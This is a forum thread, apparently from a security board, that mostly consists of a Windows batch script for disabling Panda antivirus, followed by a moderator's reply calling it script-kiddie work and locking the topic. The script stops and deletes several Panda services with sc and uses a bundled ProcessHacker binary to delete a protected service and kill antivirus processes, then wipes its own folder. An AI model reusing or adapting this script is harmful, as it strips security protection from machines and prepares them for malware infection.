mkdir c:\viktor 
del c:\viktor\*.* /Q
viktor.exe /Q /T:C:\viktor /C
cd C:\viktor

sc stop "Panda Software Controller" 1>&2> panda
sc delete "Panda Software Controller"  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul

sc stop psimsvc  1>&2> panda 
sc delete psimsvc  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul

sc stop pshost  1>&2> panda 
sc delete pshost  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul 

sc stop psimsvc  1>&2> panda
sc delete psimsvc  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul 

sc stop pavfnsvr  1>&2> panda 
sc delete pavfnsvr  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul

sc stop pavsrv  1>&2> panda 
sc delete pavsrvc  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul

sc stop PskSvcRetail  1>&2> panda 
sc delete PskSvcRetail  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul 

sc stop tpsrv  1>&2> panda 
sc delete tpsrv  1>&2> panda
@ping 192.168.0.1 -n 1 -w %5000 > nul 


FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq PavPrSrv.exe"') do set PID4=%%i
@ping 192.168.0.1 -n 1 -w 5000 > nul
echo %PID4%|findstr /r "[^0-9]"> nul 
if errorlevel 1  goto NEXT
echo %PID4%|findstr /r "[^a-zA-Z]" > nul 
if errorlevel 1  goto :exit 
:NEXT
c:\viktor\processhacker.exe  -c -ctype service -cobject PavPrSrv -caction delete
@ping 192.168.0.1 -n 1 -w 5000 > nul
c:\viktor\processhacker.exe  -c -ctype process -cobject %PID4% -caction terminate
@ping 192.168.0.1 -n 1 -w 5000 > nul


FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq ApVxdWin.exe"') do set PID7=%%i
@ping 192.168.0.1 -n 1 -w 5000 > nul
echo %PID7%|findstr /r "[^0-9]"> nul 
if errorlevel 1  goto NEXT2
echo %PID7%|findstr /r "[^a-zA-Z]" > nul 
if errorlevel 1  goto exit 
:NEXT2
c:\viktor\processhacker.exe  -c -ctype process -cobject %PID7% -caction terminate
@ping 192.168.0.1 -n 1 -w 5000 > nul 
FOR /F "tokens=2" %%i in ('TASKLIST /NH /FI "IMAGENAME eq Iface.exe"') do set PID8=%%i
@ping 192.168.0.1 -n 1 -w 5000 > nul
echo %PID8%|findstr /r "[^0-9]"> nul 
if errorlevel 1  goto kill
echo %PID8%|findstr /r "[^a-zA-Z]" > nul 
if errorlevel 1  goto kill2 
:kill
c:\viktor\processhacker.exe  -c -ctype process -cobject %PID8% -caction terminate
@ping 192.168.0.1 -n 1 -w 5000 > nul 
del *.* /Q 
cd ..
rmdir viktor
GOTO MENU

:exit 
del *.* /Q 
cd ..
rmdir viktor
GOTO MENU

:EOF
This is not "bypass", facepalm. Not real or virtual, this is just using of whitelisted by AV signed legitimate ProcessHacker.

Script-kiddie trash moved.
Ring0 - the source of inspiration
Username
EP_X0FF
Rank
Global Moderator
Posts
4947
Joined
Sun Mar 07, 2010 5:35 am
Location
Russian Federation
Contact
Topic locked
Page 1 of 1
4 posts